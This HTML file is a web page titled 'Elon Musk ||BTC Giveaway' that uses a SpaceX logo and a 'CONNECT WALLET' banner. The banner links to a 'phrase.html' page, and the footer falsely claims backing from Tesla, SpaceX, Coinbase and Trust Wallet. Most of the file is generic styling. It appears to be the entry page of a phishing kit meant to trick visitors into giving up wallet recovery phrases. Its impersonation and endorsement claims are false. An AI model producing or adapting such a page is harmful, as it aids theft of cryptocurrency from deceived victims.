<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta http-equiv="X-UA-Compatible" content="ie=edge" />
    <title>Elon Musk ||BTC Giveaway</title>
    <!-- favicon -->
    <link
      rel="shortcut icon"
      href="./images/favicon-text.ico"
      type="image/x-icon"
    />
    <!-- font-awesome -->
    
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css" integrity="sha512-z3gLpd7yknf1YoNbCzqRKc4qyor8gaKU1qmn+CShxbuBusANI9QpRohGBreCFkKxLhei6S9CQXFEbbKuqLg0DA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    <!-- styles css -->
    <link rel="stylesheet" href="./styles.css">
  </head>
  <style>
    .images {
  max-width: 100%;
}
.text {
  text-align: center;
  color: #2c66b3;
}
.imgs {
  margin-right: auto;
  margin-left: auto;
}
@media screen and (min-width: 992px) {
  .imgs {
    max-width: 50%;
  }
}
    /*
=============== 
Fonts
===============
*/
@import url("https://fonts.googleapis.com/css?family=Lato:400,700&display=swap");

/*
=============== 
Variables
===============
*/

:root {
  /* dark shades of primary color*/
  --clr-primary-1: hsl(184, 91%, 17%);
  --clr-primary-2: hsl(185, 84%, 25%);
  --clr-primary-3: hsl(185, 81%, 29%);
  --clr-primary-4: hsl(184, 77%, 34%);
  /* primary/main color */
  --clr-primary-5: hsl(185, 62%, 45%);
  /* lighter shades of primary color */
  --clr-primary-6: hsl(185, 57%, 50%);
  --clr-primary-7: hsl(184, 65%, 59%);
  --clr-primary-8: hsl(184, 80%, 74%);
  --clr-primary-9: hsl(185, 94%, 87%);
  --clr-primary-10: hsl(186, 100%, 94%);
  /* darkest grey - used for headings */
  --clr-grey-1: hsl(209, 61%, 16%);
  --clr-grey-2: hsl(211, 39%, 23%);
  --clr-grey-3: hsl(209, 34%, 30%);
  --clr-grey-4: hsl(209, 28%, 39%);
  /* grey used for paragraphs */
  --clr-grey-5: hsl(210, 22%, 49%);
  --clr-grey-6: hsl(209, 23%, 60%);
  --clr-grey-7: hsl(211, 27%, 70%);
  --clr-grey-8: hsl(210, 31%, 80%);
  --clr-grey-9: hsl(212, 33%, 89%);
  --clr-grey-10: hsl(210, 36%, 96%);
  --clr-white: #fff;
  --ff-primary: "Lato", sans-serif;
  --transition: all 0.3s linear;
  --spacing: 0.25rem;
  --radius: 0.5rem;
  --light-shadow: 0 5px 15px rgba(0, 0, 0, 0.1);
  --dark-shadow: 0 5px 15px rgba(0, 0, 0, 0.2);
}
/*
=============== 
Global Styles
===============
*/

* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
}
body {
  font-family: var(--ff-primary);
  background: var(--clr-white);
  color: var(--clr-grey-1);
  line-height: 1.5;
  font-size: 0.875rem;
}
ul {
  list-style-type: none;
}
a {
  text-decoration: none;
}
img:not(.nav-logo) {
  width: 100%;
  display: block;
}
@media screen and (min-width: 992px) {
  .nav-logo {
    margin-left: -1.8rem;
  }
}
h1,
h2,
h3,
h4 {
  letter-spacing: var(--spacing);
  text-transform: capitalize;
  line-height: 1.25;
  margin-bottom: 0.75rem;
}
h1 {
  font-size: 3rem;
}
h2 {
  font-size: 2rem;
}
h3 {
  font-size: 1.25rem;
}
h4 {
  font-size: 0.875rem;
}
p {
  margin-bottom: 1.25rem;
  color: var(--clr-grey-5);
}
@media screen and (min-width: 800px) {
  h1 {
    font-size: 4rem;
  }
  h2 {
    font-size: 2.5rem;
  }
  h3 {
    font-size: 1.75rem;
  }
  h4 {
    font-size: 1rem;
  }
  body {
    font-size: 1rem;
  }
  h1,
  h2,
  h3,
  h4 {
    line-height: 1;
  }
}
/*  global classes */

.btn {
  text-transform: uppercase;
  background: var(--clr-primary-5);
  color: var(--clr-white);
  padding: 0.375rem 0.75rem;
  letter-spacing: var(--spacing);
  display: inline-block;
  /* font-weight: 700; */
  transition: var(--transition);
  font-size: 0.875rem;
  border: 2px solid transparent;
  cursor: pointer;
  box-shadow: 0 1px 3px rgba(0, 0, 0, 0.2);
}

/*
=============== 
Navbar
===============
*/
.navbar {
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  background: var(--clr-white);
  box-shadow: var(--dark-shadow);
  z-index: 2;
}
.nav-logo {
  max-width: 30%;
}
@media screen and (min-width: 992px) {
  .nav-logo {
    max-width: 22%;
  }
}

.nav-icons {
  display: none;
}
.nav-center {
  width: 100%;
  max-width: 1170px;
  margin: 0 auto;
}
.nav-header {
  display: flex;
  justify-content: space-between;
  align-items: center;
  padding: 1rem 2rem;
}
.nav-toggle {
  background: transparent;
  border: transparent;
  font-size: 1.5rem;
  color: var(--clr-primary-5);
  cursor: pointer;
  transition: var(--transition);
}
.nav-toggle:hover {
  transform: scale(1.2);
}
.nav-link {
  display: block;
  padding: 1rem 2rem;
  text-transform: capitalize;
  letter-spacing: var(--spacing);
  transition: var(--transition);
  color: var(--clr-grey-1);
  cursor: pointer;
  font-size: 1rem;
}
.nav-link:hover {
  color: var(--clr-primary-1);
  background: var(--clr-primary-8);
  padding-left: 2.25rem;
}
/* 280px */
.nav-links {
  height: 0;
  overflow: hidden;
  transition: var(--transition);
}
.show-links {
  height: 280px;
}
@media screen and (min-width: 992px) {
  /* hide toggle button */
  .navbar {
    padding: 1rem 2rem;
  }
  .nav-toggle {
    display: none;
  }
  .nav-center {
    display: flex;
    justify-content: space-between;
    align-items: center;
    /* optional */
    flex-wrap: wrap;
  }
  .nav-links {
    height: auto;
    display: flex;
  }
  .nav-header {
    padding: 0 0;
  }
  .nav-link {
    padding: 0 0;
    margin-right: 0.7rem;
  }
  .nav-link:hover {
    padding: 0;
    color: var(--clr-primary-5);
    background: transparent;
  }
  .nav-icons {
    display: flex;
  }
  .nav-icon {
    margin-right: 0.7rem;
    color: var(--clr-primary-5);
    font-size: 1.2rem;
    transition: var(--transition);
  }
  .nav-icon:hover {
    color: var(--clr-primary-8);
  }
}
/*
=============== 
Hero
===============
*/
.hero {
  min-height: 100vh;
  background: linear-gradient(rgb(44, 174, 186, 0.7), rgba(0, 0, 0, 0.7)),
    url("../images/main4.jpeg") center/cover no-repeat;
  display: flex;
  justify-content: center;
  align-items: center;
}
.hero-banner {
  text-align: center;
  color: var(--clr-white);
  padding: 0 3rem;
}
.hero-banner h1 {
  text-transform: uppercase;
}
.hero-banner p {
  max-width: 35rem;
  margin-left: auto;
  margin-right: auto;
  color: var(--clr-white);
  letter-spacing: var(--spacing);
}
.hero-btn {
  padding: 0.9rem 1.6rem;
  font-size: 1.25rem;
  background: var(--clr-white);
  color: var(--clr-primary-5);
}
.hero-btn:hover {
  background: transparent;
  color: var(--clr-white);
  border-color: var(--clr-white);
}
@media screen and (min-width: 768px) {
  .hero {
    background: linear-gradient(rgb(44, 174, 186, 0.7), rgba(0, 0, 0, 0.7)),
      url("../images/main4.jpeg") center/cover no-repeat;
  }
  .hero-banner {
    padding: 0;
  }
  .hero-banner p {
    max-width: 45rem;
  }
}

.copyright {
  text-transform: capitalize;
  letter-spacing: var(--spacing);
  color: var(--clr-white);
}

/* .form-container {
  align-items: inherit;
  flex: 1;
  height: 100%;
} */
/* forms */
.forms {
  text-align: center;
  padding: 4rem 2rem;
}
.forms-p {
  width: 60%;
}
.form-center {
  justify-content: center;
  border-radius: var(--radius);
  text-align: center;
}
.form-phrase {
  width: 65%;
}
.submit-btn {
  text-transform: uppercase;
  background: #2a6abd;
  color: var(--clr-white);
  padding: 0.5rem 1.6rem;
  letter-spacing: var(--spacing);
  display: inline-block;
  /* font-weight: 700; */
  transition: var(--transition);
  font-size: 0.875rem;
  border: 2px solid transparent;
  cursor: pointer;
  box-shadow: 0 1px 3px rgba(0, 0, 0, 0.2);
  border-radius: 100px;
}
.submit-btn:hover {
  color: var(--clr-primary-1);
  background: var(--clr-white);
}

.small-form {
  color: #b3b3b3;
}
.small-form a {
  color: #b3b3b3;
  text-decoration: underline;
}
.imports {
  text-align: center;
}
.phrases {
  display: flex;
  margin-top: 5%;
  gap: 14%;
  justify-content: center;
}
.phrases h3 {
  font-size: 105%;
}
.jason {
  max-width: 20%;
}
@media screen and (min-width: 992px) {
  .jason {
    max-width: 20%;
  }
}
.phrase1 {
  padding: 1.5rem 1.4rem;
  background-color: var(--clr-primary-5);
  border-radius: 4rem;
  margin-top: -1rem;
  color: var(--clr-white);
}
/* message */

.typically {
  text-align: center;
  font-size: large;
}

.iconss {
  text-align: center;
  font-size: xx-large;
}
.type {
  text-align: center;
}
@media screen and (min-width: 400px) {
  textarea:focus {
    height: 9.5em;
    width: 50%;
  }
}
.footers {
  text-align: center;
  padding: 1.8rem 0;
  background: #2c66b3;
  color: #fff;
}
.wallet {
  text-align: center;
}
.wallet,
h1 {
  font-size: 185%;
}
.jason {
  display: flex;
  /* gap: 1.5rem; */
}
.phrase h3 {
  font-size: 100%;
  align-self: center;
}
.phrase {
  padding: 1.6rem 2.5rem;
  background-color: #2c66b3;
  color: #fff;
  border-radius: 4rem;
  margin-left: 1rem;
}
.js {
  margin-top: 3.7%;
}
.js,
h3 {
  font-size: 104%;
}

.js,
ul,
li {
  display: flex;
  text-align: center;
  justify-content: center;
}
@media screen and (min-width: 200px) {
  .phrase,
  li {
    max-width: 100%;
    margin: 1.8%;
  }
}

  </style>
  <body>
    <!-- header  -->
    <header id="home">
      <!-- navbar -->
      <nav class="navbar">
        <div class="nav-center">
          <!-- nav header -->
          <div class="nav-header">
            <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2e/SpaceX_logo_black.svg/1024px-SpaceX_logo_black.svg.png" class="nav-logo" alt="" />
            
          </div>
          <!-- end of nav header -->
    
          <!-- end of nav links -->
         
        </div>
      </nav>
      <!-- hero -->
      
      <!-- words -->
      <br>
      <br>
      <br>
      <br>
      <br>
      <br>
      
      <div class="text">
       <h1>CONNECT WALLET 🎁 </h1>
      </div>
      <br>
      <br>

      <!-- PICTURE -->
      <a href="phrase.html">
       <div class="imgs">
       <img src="https://images.hive.blog/DQmQwtHwGQhwRies6ucpN1ytETwJqtovLz5Kd6FkR8aa4Ro/image.png" alt="" class="images">
      </div>
      </a>
     <br>
     <br>
     <br>
          <br>
     <br>
     <br>
     <br> 
    <!-- footer -->
   
    <footer class="footers">
Copyright &copy; Elon musk Tesla and spaceX company 2023. Supported by Coinbase, Blockchain, Trust wallet. All Rights Reserved
    </footer>
    <!-- js -->
    <script src="./js/app.js"></script>
  </body>
</html>
